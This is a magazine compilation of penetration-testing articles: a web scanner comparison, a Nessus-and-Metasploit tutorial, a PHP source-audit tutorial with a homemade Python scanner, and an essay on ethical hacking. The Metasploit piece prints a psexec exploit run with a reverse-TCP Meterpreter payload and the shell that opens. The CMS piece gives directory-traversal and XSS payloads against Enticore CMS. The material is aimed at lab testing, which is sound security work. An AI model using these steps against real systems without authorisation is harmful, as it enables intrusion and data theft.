• OWASP Top 10, https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project [2]
• Nenad Jovanovic, Christopher Kruegel, and Engin Kirda, Pixy: A static analysis tool for detecting web application
vulnerabilities (short paper) [3]
• Sumit Siddharth, Pratiksha Doshi, Five common Web application vulnerabilities [4]
• OWASP Vulnerabilities Listing, https://www.owasp.org/index.php/Category:Vulnerability [5]
• Andres Andreu, Professional Pen Testing for Web Applications [6]
• Nenad Jovanovic, Christopher Kruegel, Engin Kirda, Static analysis for detecting taint-style vulnerabilities in web
applications, Journal of Computer Security 18 (2010) 861–907 [7]
• Huang, Y.-W., Yu, F., Hang, C., Tsai, C.-H., Lee, D.-T., Kuo, S.-Y., Securing web application code by static analysis and runtime
protection. In: WWW ‘04: Proceedings of the 13th International Conference on World Wide Web (2004) [8]
• Web Application Vulnerability Scanner Evaluation Project, http://code.google.com/p/wavsep [9]

more major vulnerabilities (SQLI’s and XSS’) which locations, in order to make sure the scanner reports
may be critical to the web application. the real security situation of the web application. The
scanning location can physically be anywhere in the
Conclusion world, but judging by the active nodes between the web
If manual crawling is not being used, the crawler’s results application and scanner, their number should be as
have to be checked in order to see if it managed to detect small as possible.
all the pages of the web application. If it fails to detect In order to simply avoid these issues, all web
some of the pages then it should be checked if they are applications can be carefully tested “in the lab”, before
available and maybe a manual crawl should be performed deployment, by the developers or a security team
instead. Another aspect of this issue is scanning should working together with developers.
be performed by someone who knows the web application In this particular case, black-box automated testing
and is able to notice any crawling losses (issues). managed to detect up to 80% of existing vulnerabilities
Regarding the connection issue, if possible, the (in the lab), thus making it an effective way to start
scanning could be performed from two different securing web applications. Depending on the complexity
of a web application and the value of the information
that needs to be protected (security budget should
also be taken into account), using this method alone
is sometimes not enough to obtain a fully-secured web
application and may have to be used alongside black-
box manual testing and white-box testing.

CRISTIAN OPINACRU
Cristian Opinacru is a lecturer at the
Romanian Military Academy, while at the
same time working for Thales Systems. He
holds a PhD degree from the University of
Figure 3. Graphical Representation of the Comparison
German Armed Forces in Munich and an
engineering degree from the Politehnica
University of Bucharest. He is the author of three books and
several research articles. His is interested in Security, Web and
Software Architecture.

CRISTIAN TANCOV
Cristian Tancov is a Romanian information security auditor.
Among several diplomas, he holds an “Information security”
masters degree from Romanian Military Academy with
specialization in “Web applications security testing”. His work
is highly appreciated and is often invited to hold presentations
Figure 4. Graphical Representation of Location Results regarding his activity at international events.

THE BEST OF 01/2012 Page 68 http://pentestmag.com


PENTEST EXTRA

From Footprinting to
Exploitation
In this article, you will read about penetration testing with Nessus
and Metasploit.

I
n this article I will present an overview of Nessus 4.4. Installation
I will describe installation and usage of it, and how Installation process takes a while, because Nessus
to perform penetration tests by combining Nessus downloads all the plugins from its server. Nessus
with Metasploit. Nessus is a proprietary vulnerability runs as a web based application with a single system
scanning program. It was first developed in 1998 as a service under Windows. After the installation we need to
freeware security scanner by Renaud Deraison. Nessus register at Tenable website to obtain the activation code
quickly become one of the most popular network
security scanners. Today, it still is free for personal use,
but commercial users must pay a fee.

Features
Nessus is based on a client/server architecture. It lets
users run the administrative panel, which executes
vulnerability scans and holds databases on a machine
other than the server. Client front ends are available
for Java, Win32, and X11. This makes Nessus a
cross-platform tool that can scan Linux, Windows, and
Unix hosts. Nessus provides an astonishing quantity
of customized tests called plugins. Those plugins
scan and report for over 34,000 vulnerabilities. This
includes scanning for vulnerabilities in routers, CGI
scripts, buffer overruns, remote-access connections,
back doors, RPC, and SNMP. Nessus offers a wealth
of configuration and scanning options, though some
users might find them overwhelming. An administrator
may need to devote a significant amount of time
learning the intricacies of the application to use it most
effectively. Figure 1. Nessus Server Manager

THE BEST OF 01/2012 Page 70 http://pentestmag.com


Figure 2. Nessus log-in screen

for Nessus. Before launching the client application it is Figure 4. Plugin selection during policy creation
advised to check out the settings in the Nessus Server
Manager. We can add users with different privileges the whole families of plugins and single ones as well
there, set up update options etc. (Figure 1). (Figure 4).
After starting the client application, Nessus opens in Each plugin has a description which contains of
the default web browser and we can now log in with our synopsis, description and solution.
created user (Figure 2). The last tab is Preferences, which includes means
for granular control over scan settings. Selecting an
Usage of Nessus item from the drop-down menu will display further
Once a user is logged in, they can navigate the easy to configuration items for the selected category. Note
use interface to create policies, run scans, view reports that this is a dynamic list of configuration options that
and manage users. Policies are the key part of Nessus. is dependent on the plugin feed, audit policies and
The Policy specifies what and how to scan. After typing a additional functionality that the connected Nessus
name for a policy, you decide which credentials the policy scanner has access to.
should use to connect to your target machines. You also After creating a policy, users can initiate a scan. To set
use the policy to set up groupings of vulnerability tests to up a scan we just need to input scan name, type scan
run. For example, you may have a policy that only targets type where we choose between Run Now (immediately
Web server vulnerabilities and one policy that targets execute the scan after submitting), Scheduled (choose
databases. Policies are easy to setup, but offer several the time the scan should begin) or Template (save as a
options for customizing performance. template for repeat scanning). Next step is to choose
On the first screen of policies there are general the previously created policy that the scan will use to
options such as methods for port scanning, port range set parameters controlling Nessus server scanning
etc. (Figure 3). behaviour. The last step is to set up the scan targets. We
The second bookmark is Credentials. You can can enter there a single IP address (e.g., 192.168.0.1),
select and enter different credential types there, such IP range (e.g., 192.168.0.1-192.168.0.255), subnet with
as Windows credentials, SSH settings, Kerberos CIDR notation (e.g., 192.168.0.0/24) or resolvable host
configuration and Cleartext protocol settings. By (e.g., www.nessus.org). We can also load a text file with
configuring credentials, it allows Nessus to perform list of hosts (Figure 5).
a wider variety of checks that result in more accurate After launching the scan we have to wait for some
scan results. However the most important bookmark is time depending on the amount of plugins and options
Plugins. You can select which vulnerabilities you want we have chosen in our policy. Once a scan is complete,
to check in this policy. Here you can enable or disable

Figure 3. General options for creating a policy Figure 5. Setting-up a scan

THE BEST OF 01/2012 Page 71 http://pentestmag.com


PENTEST EXTRA
which provides information about security vulnerabilities
and aids in penetration testing and IDS signature
development. This tool enables developing and executing
exploit code against a remote target machine.
To use it with Nessus, first we should create a user
for Metasploit. Let us name him msf with password
metasploit. Then we should log in with this user to
Nessus and create a policy, preferably with all the plugins
enabled. I have named mine policy. Next step is to set

Listing 1. Connecting to Metasploit database


Figure 6. List of vulnerabilities found by Nessus
we can view detailed information on vulnerabilities msf > db_driver postgresql
found. In reports tab we can view results of all previous msf > db_connect postgres:postgres user
scans. Each report allows us to easily see a top level password@127.0.0.1/metasploit
view of all machines scanned with the number of high,
medium and low vulnerabilities (Figure 6). Listing 2. Loading Nessus Bridge plugin to Metasploit
There is also an option for filtering the vulnerabilities,
for example by plugins, hosts and ports. We can then msf > load nessus
double click on a host to drill into specific details on [*] Nessus Bridge for Metasploit 1.1
the vulnerabilities which come with a multitude of [+] Type nessus_help for a command listing
suggestions, explaining the nature of the problem
and listing fixes. Links to the Common Vulnerabilities Listing 3. Connecting to Nessus from Metasploit
and Exposures (CVE) dictionary (www.cve.mitre.org),
which lists known vulnerabilities, and Microsoft TechNet msf > nessus_connect msf:metasploit@127.0.0.1:8834
(www.microsoft.com/technet), an online security resource ok
for IT administrators, are also provided, offering [*] Connecting to https://127.0.0.1:8834/ as msf
administrators further access to information resources [*] Authenticated
and existing patches (Figure 7). It is also possible to
download a report in RTF or HTML file. Listing 4. Checking Nessus policies in Metasploit

Penetration tests in Nessus msf > nessus_policy_list


Nessus can be used in any type of penetration – Black Box [+] Nessus Policy List
Test, white Box testing or even a gray boxing. So let us try
to perform a penetration test in Nessus. On the Internet we ID Name Comments
can find some tutorials how to integrate Nessus with Nmap, -- ---- --------
Hydra, Nikto and how to use it on BackTrack5. However in -5 Test policy
my opinion the best way to perform penetration tests with -4 Web App Tests
Nessus is by combining it with Metasploit. -3 Prepare for PCI DSS audits
Metasploit Framework is a part of The Metasploit -2 Internal Network Scan
Project – an open-source computer security project -1 External Network Scan
1 policy

Listing 5. Running a Nessus scan in Metasploit

msf > nessus_scan_new 1 policy 192.168.1.102


[*] Creating scan from policy number 1, called
"policy" and scanning
192.168.1.102
[*] Scan started. uid is d3b1bd0f-3f19-a37d-7f26-
3a21a6f0ff4fc5ea2af0a6d9e7c2

Figure 7. Vulnerability description

THE BEST OF 01/2012 Page 72 http://pentestmag.com


up the Metasploit database. Of course we need to install Than we need to connect to Nessus using our created
PostgreSQL first. After opening the console we need to user msf, we can do that by typing: see Listing 3.
connect to the Metasploit database by loading postgresql Now we are connected to Nessus. Next step is to run
driver and connecting to the database with postgres the scan, so at first we look at our policies: (Listing 4).
username and password. We can achieve that by the We select our created policy and then start the scan
executing the following commands: see Listing 1. by typing: (Listing 5).
To use Nessus with Metasploit we need to load Where 1 is the number of our policy, policy is its name
Nessus Bridge plugin: see Listing 2. and IP address is the address (or range of addresses)

Listing 6. Checking the scan status

msf > nessus_scan_status


[+] Running Scans

Scan ID Name Owner Started


Status Current Hosts Total Hosts
------- ---- ----- -------
------ ------------- -----------
d3b1bd0f-3f19-a37d-7f26-3a21a6f0ff4fc5ea2af0a6d9e7c2 policy msf 12:16 Aug 17 2011 running 0
1

Listing 7. Obtaining report list from Nessus in Metasploit

msf > nessus_report_list

ID Name Status Date


-- ---- ------ ----
5634be05-cd10-5792-ae81-7143733b4010cf75dddc6f4f120f policy completed 21:16 Aug 16 2011
d3b1bd0f-3f19-a37d-7f26-3a21a6f0ff4fc5ea2af0a6d9e7c2 policy completed 12:16 Aug 17 2011

Listing 8. Obtaining report from Nessus in Metasploit

msf > nessus_report_get d3b1bd0f-3f19-a37d-7f26-3a21a6f0ff4fc5ea2af0a6d9e7c2


[*] importing d3b1bd0f-3f19-a37d-7f26-3a21a6f0ff4fc5ea2af0a6d9e7c2
[*] 192.168.1.102 Windows 7 Home Done!
[+] Done

Listing 9. Viewing the vulnerabilities found by Nessus

msf > vulns


[*] Time: 2011-08-17 19:26:19 UTC Vuln: host=192.168.1.102 port=139 proto=tcp name=Microsoft Windows SMB Service
Detection refs=NSS-11011
[*] Time: 2011-08-17 19:26:18 UTC Vuln: host=192.168.1.102 port=135 proto=tcp name=DCE Services Enumeration
refs=NSS-10736
.
.
.
[*] Time: 2011-08-17 19:26:19 UTC Vuln: host=192.168.1.102 port=445 proto=tcp na
me=Microsoft Windows SMB Log In Possible refs=CVE-2002-1117,BID-494,CVE-1999-050
4,CVE-1999-0505,CVE-1999-0506,CVE-2000-0222,CVE-2005-3595,BID-990,BID-11199,OSVD
B-297,OSVDB-3106,OSVDB-8230,OSVDB-10050,MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394

THE BEST OF 01/2012 Page 73 http://pentestmag.com


PENTEST EXTRA
Listing 10. Searching for exploits

msf > search exploits Microsoft Windows Authenticated User Code Execution

exploit/windows/smb/ms04_007_killbill 2004-02-10 low Microsoft


ASN.1 Library Bitstring Heap Overflow
exploit/windows/smb/smb_relay 2001-03-31 excellent Microsoft
Windows SMB Relay Code Execution
.
.
.
exploit/windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great Timbuktu
<= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow

Listing 11. Using the chosen exploit to check the vulnerability

msf > use exploit/windows/smb/psexec


msf exploit(psexec) > set RHOST 192.168.1.102
RHOST => 192.168.1.102
msf exploit(psexec) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

smbuser => name of user


msf exploit(psexec) > set smbpass password of user
smbpass => password of user
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.102:4444
[*] Connecting to the server...
[*] Authenticating as user 'name of user'...
[*] Uploading payload...
[*] Created \waLRflKs.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (LEHfUmhS – "MxiyDeHViboMJBtKA")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \waLRflKs.exe...
[*] Sending stage (748032 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1201) at Wed Aug 17 13:12:57 2011
meterpreter >

THE BEST OF 01/2012 Page 74 http://pentestmag.com


that we want to scan. We can check the scan status by Conclusion
typing: Listing 5. The Nessus bridge for Metasploit is a great user
After the scan is finished we want to see the report. To community project that has allowed Nessus to
do that we must get its id: see Listing 7. integrate with other popular security tools. You could
Now we must select the report we want to view using even automate the above process using a script that
its id: see Listing 8. would launch Nessus, run a scan, and exploit the
The report is loaded so now we can see the remotely exploitable vulnerabilities. After working for
vulnerabilities that Nessus has found: see Listing 9. some time with Nessus I must say it is a very good
We can browse those vulnerabilities and after we tool and I recommend it to everyone. Nessus is very
found one that looks like a threat we can exploit it. easy to use and provides the tester with all necessary
To do that we simply search the exploit list using that tools to perform sophisticated network analysis. With
vulnerability name: see Listing 10. addition of Nmap and Metasploit Framework it creates
We will get a huge list of exploits, showing their a complete range of tools to analyze the network and
name, date, rank and description. Now we can select find vulnerable areas in it.
one of them that we think is the best for exploiting this
vulnerability and set its parameters: see Listing 11.
We have successfully run the exploit. The commands
shown above set the target to be attacked host PIOTR CHYNAŁ
(RHOST) and the host to call back to once the target Piotr Chynał – PhD student at the
system has been exploited (LHOST). We have used Wroclaw University of Technology, on
meterpreter reverse tcp tunnel and entered the smb Computer Science and Management
user and password. Exploitation here was simple Faculty. He specialises in Human-
– the payload was uploaded as the random-named Computer interaction. His knowledge
executable waLRflKs.exe which was then run and the and experience in network security
rest of the initialization job was accounted for. In the end comes from various lectures at the university and from
we have entered a meterpreter-shell and now we can working in one of the largest polish construction company as
get all sorts of information about the system. an IT/security specialist.

a d v e r t i s e m e n t

������������������������������������������������
���������������������������������

���������������������������������������������������������
������������������������������������������������������

���������������������
����������������
����������������
�������������
����������������
����������������������
PENTEST EXTRA

Web Application
Security
Source Code Testing
In this short article we’ll learn how to check whether the web
application is vulnerable to Internet attacks. “Why should I test the
software on my own?” The need is obvious if we use open source
software. For example, our company is engaged in IT outsourcing.

B
y using our web site, managers can send us read this documents, you should really do it. It will helps
their documents and resume. In our web page, you to get more knowledge about insecurity in web
we have installed and configured some kind of applications.
popular CMS (Content Management System).
But what will be in the situation when we do not test What do we need?
our CMS for security vulnerabilities? What if someone Beside of knowing OWASP’s documents, good
else will do this? The answer is: someone will know point here is to buy (or find at Google ;)) this book:
where in our version is vulnerability – we will not. Just
imagine then, how we present the image of confidential
of our company? Let’s say this person who check
software for security bugs is a bad hacker working for
some competitive firm (IT outsourcing too). Can they
grab all our resumes or not?

OWASP TOP 10
Basically OWASP Testing Guide 3 said: The most
common web application security weakness is the
failure to properly validate input coming from the client
or environment before using it. This weakness leads to
almost all of the major vulnerabilities in web applications, Figure 1. knewme3.py help
such as cross site scripting (XSS), SQL injection,
interpreter injection, locale/Unicode attacks, file system
attacks, and buffer overflows.
We can find a lot of interesting documents about
web application security, exploitation and method
of prevention at OWASP’s site. One of them is
OWASP TOP 10 (this one and others you can find at
www.owasp.org). If You don’t know this site and don’t Figure 2. Enticore CMS available at http:// sourceforge.net

THE BEST OF 01/2012 Page 76 http://pentestmag.com


Programmer’s Ultimate Security
DeskRef: Your programming
security encyclopedia. In this
book You’ll find almost all of
vulnerable functions in various
types of languages (and of course
for PHP, what we need right now).
For our test we will use Ubuntu
10.04, Apache 2.2.6 and PHP Figure 3. knewme3.py and log �le

Listing 1. knewme3.py - Source code of our simple scanner (part 1)

# --------------------------------------------------- print "\t-----------------------------"


# knewme.py @ 2o11 - v3 print "try this way:"
# --------------------------------------------------- print "\t-d /dir/where/you/wanna/find/phps"
# This is a sample 'dirty hack' for php src audit. print "\t-f /dir/where/is/your/file.php"
# print "\t-h thats me!"
# dated : print "\n[~] try again ;)"
# xx.o9.2o11 + ...?
# elif o in ("-d","--dir"):
.o9.2o11 + php files 'founded' path = sys.argv[2] +"*.php" # updated by glob()
# 27.o9.2o11 + output.html .o9 to find .phps
# + project started logfile = open('dir_check.log','w')
#---------------------------------------------------- for stri in glob.glob(path):
# run: python knewme.py /dir/with/files/in/php/ log = logfile.write(stri) # ---| these 2 lines
# hf o/ log to file $logfile
# log = logfile.write("\n") # ---|
logfile.close()
import sys # arg print ("[+] List of php files founded at "+path+"
import glob # list files end elemIT are noted in [dir_check.log]")
import getopt # opts implementation
# -------------------------------------------------- sys.exit()
# argvs elif o in ("-f","--file"):
try: path = sys.argv[2] # = argv[1]
opts, args = getopt.getopt(sys.argv[1:], "hdf:v", filek = open(path, 'r') # read mode
["help","dir=","file="]) stri = filek.readlines() #
except getopt.GetoptError, err: filek.close() # close the file (its already 'readed'
print str(err)
print "Ups... ;C Try with -h;)" print " <html><head><title> KnewMe Project @ 2011
sys.exit(2) - This is Your Rerport</title></head>"
print " <body><br>"
verbose = False print " <center><b><h1> KnewMe Project @ 2011
for o, a in opts: <br></b><center></h1>"
if o == "-v": print "<b><p align=\"left\"><br>[+] Now checking
verbose = True file: ", filek.name
elif o in ("-h","--help"): print "</b>"
print ""
vulnlist = open('vuln.php_list','r')
Listing 2. knewme3.py - Source code of our simple scanner (part for vulnline in vulnlist:
2)
print "\t-----------------------------"
print "\t[<>] knewme.py @ 2o11.v3 [<>]"

THE BEST OF 01/2012 Page 77 http://pentestmag.com


PENTEST EXTRA
with display_errors = On in php.ini (which is of course a Also for our tests we will need Python 2.6, so if You
security breach, but for our tests we must know, where have not installed it yet, do it now.
we can find a bug, so that’s why we set it up for On).
First things first
Adventure of source code testing
starts now! When You open your
favorite editor, paste there code
Figure 4. Vulnerable $dir parameter
presented at “Listing 1-3”. So
Your new tool should look like this:
Listing 1.
I am the author of this tool
so feel free to use it, rewrite it,
and develop. As You can see at
above 3 screens, we have a nice
tool coded in python to check if
in argv[1] file is any of functions
vulnerable to attack. Open Your
favorite editor again and put there
Figure 5. Vulnerable $dir parameter – source code this list (remember to put one

Listing 3. knewme3.py - Source code of our simple scanner (part 3)

print ("<b><p align=\"left\">[+] Possible vulnerable


function name is : <font color=\"red\"> "+vulnline+" </font> </p></b>")

i=1
v = vulnline.strip()
for line in stri: # for $line.find(?) in str=filedsk
if line.find(v) != -1:
print ""
print " <table border=\"1\">"
print " <tr bgcolor=\"teal\">"
print " <th>line</td><td>check this</th>"
print " </tr><tr bgcolor=\"white\">"
print (" <td> %d </td><td> %s </td>") % (i,line)
print "<br>"
print " </tr>"
print " </table>"
print "</body></html>"
i+=1
# ----------------------------------------------------------- end of for...

print "<b>---------------[ END of this test HERE ] ---------------</b>"


# --------------------------------------------------------------------end of for...

print ""
print "[+] vulnerable function list : vuln.php_list"
print ""
# -- end of last elif
else :
assert False, "unhandled option"

THE BEST OF 01/2012 Page 78 http://pentestmag.com


developing knewme3.py I have
downloaded Enticore CMS (available
at http://sourceforge.net).
When You get it on Your localhost,
install it at your webroot directory,
setup users and so on. Now its time
to run knewme3.py for this CMS.
Lets try to check where are PHP files
located: Figure 3.
As we can see, knewme3.py
started with -d catalog option found
some PHP files and log their locations
to dir_check.log. Nice. Checking other
catalogs gives us this file: ./include/
plugin/EnticorePluginUpload.php. Is it
really interesting? Lets find out! Type
in Your console:

python knewme3.py -f /var/www/enticore-


Figure 6. Exploited vulnerability
0.8/include/plugin/
EnticorePluginUpload.php > ourlog.html

And now lets check what’s in


ourlog.html: Figure 4.
Ok. So now we must check where
in this file is this $dir parameter, and
how its working: Figure 5.
Vulnerability exist in lines started
at number 65. Like we see, there is
Figure 7. Enjoy http://securityreason.com
no validation of this GET request.
function name per line): basename, bzread, chmod,
chown, chroot, dirname, eval, exec, fgetsfile, fopen,
fread, fscanf, fsockopen, getallheaders, getenv, gzfile,
gzget*, gzopen, gzread,, Highlight_file, is_*, leak, link,
lstat, mkdir, opendir, passthru, popen, posix_*, readfile,
rename, rmdir, show_source, stat, symlink, system,
unlink. As You can see at source code of knewme3.py,
save this list to vuln.php_list file (it will be some kind of
our dictionary). So in our Ubuntu-lab we have 2 files
now: knewme3.py and vuln.php_list. Run python script
as showed Figure 1.
Ok. So now we know how to check if CMS available at
ours company’s page can be vulnerable to PHP attacks.
(Good thing to remember: by using knewme3.py we can
show some potential vulnerabilities of CMS/webapp.
Looking at configuration files of PHP or Apache or
whatever else is on WWW server, there could be more
holes – for example indexing, or clear text files with
database passwords (like .inc files).)

Run tests for Your web application


Good example how this script is really working is to
download some CMS to our localhost. While I was Figure 8. “$site” parameter

THE BEST OF 01/2012 Page 79 http://pentestmag.com


PENTEST EXTRA
www.owasp.org/index.php/Cross-
site_Scripting_%28XSS%29) and
could be very dangerous.
For a simple homework I’ll give
You source code of this simple
python script (knewme3.py), so
have a nice vulnerability scanning!

Any defense?
Think. It is Your power. Try to
understand that attackers can
place payload for LFI/RFI/XSS/
Figure 9. Successful XSS attack
SQL injection, and so much other
types of web attack in any of
Nice to know your input field. So validate them
• http://owasp.org and be careful. If You miss some
• http://securityreason.com parameters or form field, someone
• http://sourceforge.net
• http://google.com won’t do it, be cause like they say:
A chain is only as strong as its
weakest link.
So maybe we should check if there is an option to
put $dir, to somewhere else than ‘ ’. Log in to web
application to do this test (this vulnerability exist for
logged only users).
For this test let’s use simple directory traversal
attack: ../../../../../../../../../../../../../../. If
vulnerability really exist we should see a root directory
listing (/).
It looks like we have found a security vulnerability in
source code! This kind of vulnerability is described as a
Directory Traversal Attack (http://en.wikipedia.org/wiki/
Directory_traversal_attack).
Lets try another one parameter founded by
knewme3.py. For this test quite interesting is $site
parameter. For this one we don’t have to be logged in.
Like we see in source code and html output log from
script, we have few if()’s for $site parameter.
But wait for a moment. Let’s look at this little closer:
we have if 1, else if 2, else if 3, and so on, but what if
we put to $site some text that is not coded to if/else
behavior in PHP application?
To check it, just go visit Your http://192.168.1.4/
enticore-0.8/index.php\ ?plugin=EnticorePluginUpload&site
=SOME%20RANDOM%20TEXT&dir=yo.
Like You will see there is an error for not coded to if/
else behavior’. This error gives us exactly this text, that
we’ve put in URL. Ok, so if there is PHP code working
like an echo for value putted to $site, we are going JAKUB GAŁCZYK
to check next thing. Will this application echo back Jakub is working for goverment, banks, and �nancial
<script>alert(123)</script>? companies as an independent IT Security consultant.
Sure it will be! And once again be cause of no proper Free time he is spending at writing tools and exploits for next
validation there is another hole in this CMS. This projects.
one is described as an Cross Site Scripting (https:// jakub.galczyk@gmail.com, http://hauntit.blogspot.com

THE BEST OF 01/2012 Page 80 http://pentestmag.com


Page
PENTEST EXTRA

The Benefits of Ethical


Hacking
The wide growth of the Internet has brought good things to the
modern societies such as easy access to online stores, electronic
commerce, emails, and new avenues of information distribution
and advertising. As with most technological advances, there is
always a dark side: the criminal hackers where they represent a
threat to these information avenues.

D
espite the fact that companies, governments, used by intruders to investigate the security gaps, and
and individuals around the world are anxious to vulnerabilities without damaging the target systems or
be a part of such revolution, there are always steal information. Once such process is complete, the
a fear of hackers who will break into their web servers security team will report back to the owners with the
and steal their data and sensitive information. With vulnerabilities they found and instructions on how to
these concerns and others, the ethical hacker can help eliminate such security gaps.
eliminate such fear, and introduce different solutions to
these problems. What is Ethical Hacking do?
Professional ethical hackers possess a variety of
Introduction skills and must be completely trustworthy since while
With the fast growth of the Internet technologies, testing the client’s systems security they may discover
computer security has become a major concern for information about their clients that should remain
governments and business where the possibility of being secrets. The publication of such information could lead
hacked is proportional to the security implemented in to real intruders to break into the clients’ systems and in
their infrastructure. In addition to the above concern, the most cases lead to financial losses. Ethical hackers must
potential customers of the services provided by these be trusted to exercise tight control over any information
entities are worried about maintaining control of their that might be a target of misused by intruders. Due to
personal information that can vary from social security the sensitivity of the information gathered during the
numbers, to credit card numbers to home addresses. evaluation of the vulnerable systems, strong measures
In an effort to find a proper approach to the problem, are required to be taken into considerations to ensure
organizations came to realize that on of the best solution that the security of the systems being employed by the
to the problem is to evaluate the intruder threat where ethical hackers are intact. During the evaluation of a
computer security professionals can be hired to attempt system’s security, the ethical hackers seek the answers
to break into their computer systems. Such approach to some of the following questions:
is similar to having independent auditors to verify an
organization’s bookkeeping records. With the same • What can an intruder see on the target systems?
concept, professional security team We call them ethical • What can an intruder do with the information
hackers will employ the same tools and techniques captured?

THE BEST OF 01/2012 Page 82 http://pentestmag.com


• What is organization trying to protect? testing is to determine security weaknesses, and also
• How much effort, time, and money are an testing how an organization’s security policy compliant
organization is willing to expend to obtain adequate with standard security guidelines.
protection? Some clients insist that as soon as the ethical hackers
gain access to their network or to one of their systems,
Once the answers to the above questioned were the evaluation should halt, and the client should be
determined, a security evaluation plan is drawn up by notified. Such short of ruling should be discouraged
the ethical hackers where it can identify the system since it prevents the client from learning more about
to be tested, how such systems will be tested, and what ethical hackers might discover more about their
determining any limitations implemented in the testing systems vulnerabilities, and other issues that might
plan. harm their systems. The timing of such evaluation also
In a society so dependent on computers and networks, might be important to the client where the client may
breaking through somebody’s systems is considered request that such test be conducted within specific hours
anti-social behaviours, and as such organizations to avoid affecting networks, and systems during regular
and business investing the best they can to have the working hours. While such request and restriction might
best security in place to protect their interests and not be recommended it represents a certain percentage
their information. However, with the best security and of accuracy since most intruders do attack outside of
best security policy in place, a break-in still occurs by the local regular working hours. However, attacks done
determined hackers. The only solution for organizations during regulate working hours may be easily hidden
and businesses to avoid such problem could lie in the since most of the alerts from intrusion detection system
form of ethical hackers where such group get paid to hack may even be disabled or less carefully monitored during
into supposedly secure networks and expose flaws. the working hours of the day.
It is important to point out that unlike security Organizations and companies should allow enough
consultants where they carry out specific tests to check time for the penetration test to be done properly
out vulnerabilities, the hacking done by an ethical hacker since last minute evaluations are of little use, and the
is real test to such security vulnerabilities through similar implementation of corrections for discovered security
deployment of tools and attacks used by intruders. problems might take more time than is available, and
No matter how layered and extensive the security may introduce new system problems. In order for the
architecture is constructed within any organization’s client to receive a valid evaluation, the client must be
infrastructure, the potential for external intrusion still cautioned to limit prior knowledge of the test as much
unknown until its defences are realistically tested. as possible for ethical hacker to run a real live test.
Despite the fact that most organizations usually hire Having such knowledge known to the organization’s
security specialists to protect their domains, the fact employees will make the hacking process unreal since
remains that security breaches happen due to the lack client’s employee will be running ahead of the ethical
of knowledge about the organization’s systems, and hackers locking doors and windows. Having a limited
its potential vulnerabilities. The solution to solve such number of people at the target organization who know
vulnerabilities is for organizations to hire ethical hackers of the impending evaluation, it becomes possible for the
where they can test and determine such vulnerabilities evaluation to reflect the organization’s actual security
through different ways of breaking into the systems and exposure to the outside world.
presenting the right solutions for such organizations to Once the contractual agreement with ethical hackers is
eliminate the existing security gaps within their security in place, the testing may start as defined in the agreement.
infrastructure. It’s important to point out that penetration test itself poses
some risks to the client networks and systems, since
Ethical Hacking – Penetration Test criminal hackers might monitor the transmissions of the
Penetration testing (also called pen testing) is the practice ethical hackers and learn the same information about
of testing web applications, computer systems, and the client during such test. In such case, if the ethical
network to find vulnerabilities that any intruder may exploit. hackers identify weakness in the client’s security, the
Such test can be automated with software applications or criminal hackers could potentially attempt to exploit
can be performed manually. In either way, the process such vulnerabilities, and as such; implementing the best
encompasses gathering information about the target approach to avoid such dilemma is very important. One
system, identifying possible entry points, attempting to of these approaches is for ethical hackers to maintain
break in (either for real or virtual) and reporting back such several addresses around the Internet from which the
findings to the client. The main objective of penetration transmission will emanate and to switch origin addresses

THE BEST OF 01/2012 Page 83 http://pentestmag.com


PENTEST EXTRA
often. A complete log of the test performed by the ethical • Physical entry – This test examine the physical
hackers is always a good idea to be maintained for the penetration of the organization’s building. Security
final report, and also to identify any unusual event that guards or police could become involved if the
might happen during the test. In many cases, additional ethical hackers fail to avoid detection.
intrusion monitoring software can be deployed at the
target to ensure that all the testes are coming from the Penetration test usually have strategies, and such
ethical hacker’s machines. strategy include the following:
The line between criminal hacking and computer virus
writing is becoming increasingly blurred, and as such; • Target testing – Such test is performed by the
many clients request from ethical hackers to perform penetration testing team (Ethical hackers) in
testing to determine the client’s vulnerabilities to web- coordination with the organization’s IT team. It
based virus and email. However, it is far better for the is sometimes referred to as a light-turned-on
client to deploy strong antivirus software, to keep it up approach since everyone can see the test being
to date, and implement a clear and simple policy within carried out.
an organization to report any incidents. • External testing – This type of pen test targets
There are several kinds of testing that can be done a company’s external visible servers or devices
during the penetration test, and any combination of the including web servers, firewalls, domain name
following may be called for: servers (DNS), or email servers. The objective of
such test is to find out if outside attackers can get
• Remote network – This test simulate the intruder in, and how far they can get in and gain access.
launching an attack across the Internet. The • Internal testing – this test mimics an inside attack
primary defences that must be defeated are filtering behind the firewall by an authorized user with
routers, firewalls, and web servers. standard access privileges. Such test is useful
• Remote dial-up network – This test simulates the for estimating how much damage a disgruntled
intruder launching an attack against the client’s employee could cause.
modem pools. The primary defences that must be • Blind testing – Such test simulates the procedures
defeated are the user authentication schemes. and actions of a real attacker by severely limiting
• Local network – This test simulates authorized the information given to the person or team that’s
person has a legal connection to the organization’s performing the test beforehand.
network. The primary defences that must be • Double blind testing – Such test is conducted while
defeated are internal web servers, Intranet firewalls, one to two people within the organization might be
server security measures and e-mail systems. aware of the test. The test can be useful for testing
• Stolen laptop computer – This test makes use of an organization’s security monitoring and incident
the laptop computer of a key employee within the identification as well as its response procedures.
organization. The test will
examine the computer for
passwords stored in dial-up
software corporate information
assets, and personal
information.
• Social engineering – This
test will evaluate the target
organization’s staff as
to whether it would leak
information to someone. In
such test, the ethical hacker
will be calling the organization’s
computer help line and asking
for the external telephone
numbers of the modem pool.
Defending against such attack
is hard, because people and
personalities are involved. Figure 1. Different point of attacks that expose security vulnerabilities

THE BEST OF 01/2012 Page 84 http://pentestmag.com


The Final Penetration Report long time ago by many automobile companies during
The final report represents a collection of all of the ethical the crash-testing cars to identify the weakest points of
hacker’s discoveries as the result of the penetration test their products. From a practical standpoint the security
evaluation. Vulnerabilities found during such test are problem will remain as long as manufacturers remain
